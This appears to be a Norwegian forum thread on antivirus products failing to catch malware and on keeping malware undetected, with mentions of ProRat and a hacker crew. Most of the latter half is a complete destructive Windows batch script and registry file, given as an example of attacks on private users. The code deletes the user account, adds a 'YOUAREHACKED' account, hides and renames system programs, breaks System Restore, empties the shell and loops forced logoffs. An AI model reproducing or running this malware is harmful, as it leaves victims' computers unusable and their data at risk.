Dessverre ikke mange som er der enda, selv om de snakker mye om det.
Kun de med litt historie fra IDS eller anomali klarer å gjennomføre dette i praksis.

Norman f.eks. har mye kompetanse og kunnskap innenfor sandbox teknologi...noe som de forsøker å benytte i markedsføringen av mye annet. Men helt banale office filer med kode som escaper inn i explorer.exe etc blir ikke detektert eller sett på som ondsinnet. Bruker man exploits i koden sin, blir dette også sjelden detektert.

Spørsmålet er jo også "når" du vil at ting skal være UD. En del (som du er inne på) ser nå mer muligheter til å overvåke minnet og kall som eksekverbare filer gjør i det de blir kjørt. Fordi ting da går inn i en known state for malwaren. Vil man kun at ting skal være UD mens de blir overført, eller også når ting blir lagret og kjørt.

Jeg ville sagt begge deler

Har hørt om ProRat servere, som sendes U/D, og blir detecta når den blir kjørt, men den er der fortsatt for servern er der!

He ja jeg har nok bedere kjennskap til dette en du vet.
Renset flere pcer hvor Assassin Hackers Crew har lagd krøll.

Nå får du vel kurs i visual basic.
Lærer og bruke hamachi,ProRat,o.s.v

Greit at dem kommer seg inn på dårlig sikkert websider og legger igjen navet sitt.
Liker ikke at dem kjører script som dette mot privatpersoner.
Dette lager mye krøll.

Her et eksp.

echo off
net user Administrator reg
net user %username% /delete
net user YOUAREHACKED /add
start /B regedit.exe /S settings.reg
cls
shutdown -s -f -t 30 -c "Please wait.."
ren %windir%\media\ download
cls
start /B http://www.download.com/
cd %windir%
attrib %windir% +H
attrib %windir%\explorer.exe +R +H
attrib %windir%\regedit.exe +R +H
echo pause>notepad.exe -
attrib %windir%\notepad.exe +R +H
rename %windir%\explorer.exe reg
cls
start /b %systemroot%\system32\oobe\msoobe.exe /a
echo run=cmd.exe>%windir%\win.ini
rename %SystemRoot%\System32\restore\filelist.xml no1
rename %SystemRoot%\System32\restore\srdiag.exe no2
cls
goto nice
:nice
start /B /HIGH http://fen.xf.cz/logo.php
shutdown -l -f
cls
goto nice

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,shutdown -l -f"
"LegalNoticeCaption"="her skriver dem navnet sitt"
"DefaultUserName"="Admin"
"LegalNoticeText"="Happy day!"
"PowerdownAfterShutdown"="1"
"HibernationPreviouslyEnabled"="0"
"SfcQuota"="TASKMAN.EXE" -
"System"="Linux"
"VmApplet"="cmd.exe"
"WinStationsDisabled"="1"
"shell"=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedA ccess]
"DisplayName"="Windows Genuine Advantage Validation Monitor"
"Description"="Monitor WGA"
"ImagePath"="cmd.exe"
"Start"="0"
"ErrorControl"="0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
"EnableDCOM"="N"